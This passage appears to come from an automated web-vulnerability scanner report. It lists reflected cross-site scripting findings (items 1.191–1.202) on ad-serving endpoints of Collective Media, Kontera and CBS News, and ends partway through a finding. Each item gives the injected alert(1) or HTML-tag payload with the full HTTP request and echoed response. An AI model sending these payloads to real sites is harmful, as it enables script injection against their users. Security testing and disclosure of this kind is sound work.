The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffd2a'-alert(1)-'1bc15b5788c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/cm.dailymailffd2a'-alert(1)-'1bc15b5788c/ron_052010;sz=300x250;net=cm;ord=3412338;ord1=572356;cmpgurl=http%253A//www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:35:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 14-Feb-2011 09:35:29 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Content-Length: 9197

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-77028052_1297647329","http://ib.adnxs.com/ptj?member=311&inv_code=cm.dailymailffd2a'-alert(1)-'1bc15b5788c&size=300x250&referrer=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&redir=http%3A%2F%2Fad.doubleclic
...[SNIP]...

1.191. http://k.collective-media.net/cmadj/cm.drudgerep/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6385'-alert(1)-'77065afc5a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/cm.drudgerepf6385'-alert(1)-'77065afc5a2/;sz=300x250;net=cm;ord=$cacheBuster$;ord1=789918;cmpgurl=http%253A//www.drudgereport.com/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 02:10:21 GMT
Connection: close
Content-Length: 8383

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-64453616_1297649421","http://ib.adnxs.com/ptj?member=311&inv_code=cm.drudgerepf6385'-alert(1)-'77065afc5a2&size=300x250&referrer=http%3A%2F%2Fwww.drudgereport.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.drudgerepf6385%27-alert%281%29-%2777065afc5a2%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-64453616_1297649421%
...[SNIP]...

1.192. http://kona5.kontera.com/KonaGet.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c2dd"%3balert(1)//6cad627a8b3 was submitted in the l parameter. This input was echoed as 2c2dd";alert(1)//6cad627a8b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1297647428875&p=113247&k=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.htmljpNNP3&al=1&l=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html2c2dd"%3balert(1)//6cad627a8b3&t=Is+the+army+tightening+its+grip+on+Egypt+%3F+-+Africa+%2C+World+-+The+Independent&m2=The+Independent+now+has+a+Google+Chrome+Extension+.+Get+the+latest+news+on+the+topics+you+like+%2C+direc&rId=0&rl=0&1=14&mod=65555&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 1953

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=113247&layout=adlinks&sId=1401&cb=1297647520&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(6);
reJs
...[SNIP]...
RequestId="37787202445334700";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html2c2dd";alert(1)//6cad627a8b3&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

1.193. http://kona5.kontera.com/KonaGet.js [rId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74fff"-alert(1)-"bf142052b was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1297647428875&p=113247&k=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.htmljpNNP3&al=1&l=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&t=Is+the+army+tightening+its+grip+on+Egypt+%3F+-+Africa+%2C+World+-+The+Independent&m2=The+Independent+now+has+a+Google+Chrome+Extension+.+Get+the+latest+news+on+the+topics+you+like+%2C+direc&rId=074fff"-alert(1)-"bf142052b&rl=0&1=14&mod=65555&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 2004

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=113247&layout=adlinks&sId=1401&cb=1297647521&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(6);
reJs
...[SNIP]...
,157813,'army',512,1,"","39905;57830;7753");
addContentLink(560,1335360,'elections',537,1,"","39905;57830;7753");
}, "reaction response");
konaSafe(function(){
konaTweakMode=134299923;
konaRequestId="074fff"-alert(1)-"bf142052b";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&dc_aff_id=");
onKonaReturn(
...[SNIP]...

1.194. http://mads.cbsnews.com/mac-ad [&adfile parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the &adfile request parameter is copied into the HTML document as plain text between tags. The payload 63eb8<a>ae9d22d54df was submitted in the &adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?SP=16&_RGROUP=15001&NCAT=250%3a503544%3a&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cbsnews.com&PTYPE=8301&CNET-ONTOLOGY-NODE-ID=503544&&CID=20031629&&POS=200&ENG:DATETIME=2011.02.13.20.35.25&SYS:RQID=00phx1-ad-e21:4D586AC51D0143&&REFER_HOST=www.cbsnews.com&&&&&DVAR_INSTLANG=en%2dUS&DVAR_LB_MPU=1&&adfile=7074/11/445159_wc.ca63eb8<a>ae9d22d54df HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:45:31 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:45:31 GMT
Content-Length: 717

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="SP=16&_RGROUP=15001&NCAT=250%3a503544%3a&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cbsnews.com&PTYPE=8301&CNET-ONTOLO
...[SNIP]...
-ID=503544&&CID=20031629&&POS=200&ENG:DATETIME=2011.02.13.20.35.25&SYS:RQID=00phx1-ad-e21:4D586AC51D0143&&REFER_HOST=www.cbsnews.com&&&&&DVAR_INSTLANG=en%2dUS&DVAR_LB_MPU=1&&adfile=7074/11/445159_wc.ca63eb8<a>ae9d22d54df" _REQ_NUM="0" -->
...[SNIP]...

1.195. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 6c6da<a>a48d6ff9148 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=806c6da<a>a48d6ff9148&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:11 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:11 GMT
Content-Length: 591

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=806c6da<a>a48d6ff9148&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80664869148' CNET-PTYPE='00' POS='100' NCAT='250:503544:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.196. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into a JavaScript inline comment. The payload 68943*/alert(1)//59a571ec2f7 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=168943*/alert(1)//59a571ec2f7&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:07 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:07 GMT
Content-Length: 572

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=168943*/alert(1)//59a571ec2f7&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='16894315957127' SPECIFIED. BEACON CALL FAILED. */;window.CBSI_PAGESTATE='1||;cbsnews.com;;|-1';/* MAC [r20101202-0915-v1-13-13-JsonEnco
...[SNIP]...

1.197. http://mads.cbsnews.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1aa3'%3balert(1)//8fee192004 was submitted in the BRAND parameter. This input was echoed as b1aa3';alert(1)//8fee192004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b1aa3'%3balert(1)//8fee192004&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:49 GMT
Server: Apache/2.2
Content-Length: 1119
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b1aa3'%3balert(1)//8fee192004&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DV
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=14617&amp;sg=1815&amp;o=250%253a503544%253a&amp;h=cn&amp;p=2&amp;b=55b1aa3';alert(1)//8fee192004&amp;l=en_US&amp;site=162&amp;pt=8301&amp;nd=503544&amp;pid=&amp;cid=20031629&amp;pp=100&amp;e=&amp;rqid=01phx1-ad-e18:4D5842B347B577&amp;orh=cbsnews.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppart
...[SNIP]...

1.198. http://mads.cbsnews.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload b2ce6*/alert(1)//8b4283b85c0 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b2ce6*/alert(1)//8b4283b85c0&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:53 GMT
Server: Apache/2.2
Content-Length: 1118
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b2ce6*/alert(1)//8b4283b85c0&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.199. http://mads.cbsnews.com/mac-ad [CELT parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 18e49<a>b9fc646e6 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js18e49<a>b9fc646e6&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:48 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:35:48 GMT
Content-Length: 521

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js18e49<a>b9fc646e6&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" -->
...[SNIP]...

1.200. http://mads.cbsnews.com/mac-ad [CID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the CID request parameter is copied into a JavaScript inline comment. The payload ebef0*/alert(1)//0a018d77dd was submitted in the CID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629ebef0*/alert(1)//0a018d77dd&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:06 GMT
Server: Apache/2.2
Content-Length: 1113
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:06 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629ebef0*/alert(1)//0a018d77dd&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.201. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 7f73f*/alert(1)//b4ca9862b97 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US7f73f*/alert(1)//b4ca9862b97&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:03 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:03 GMT
Content-Length: 608

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US7f73f*/alert(1)//b4ca9862b97&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTAT
...[SNIP]...

1.202. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 9d43c<a>fd7ee7a98b4 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS9d43c<a>fd7ee7a98b4&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
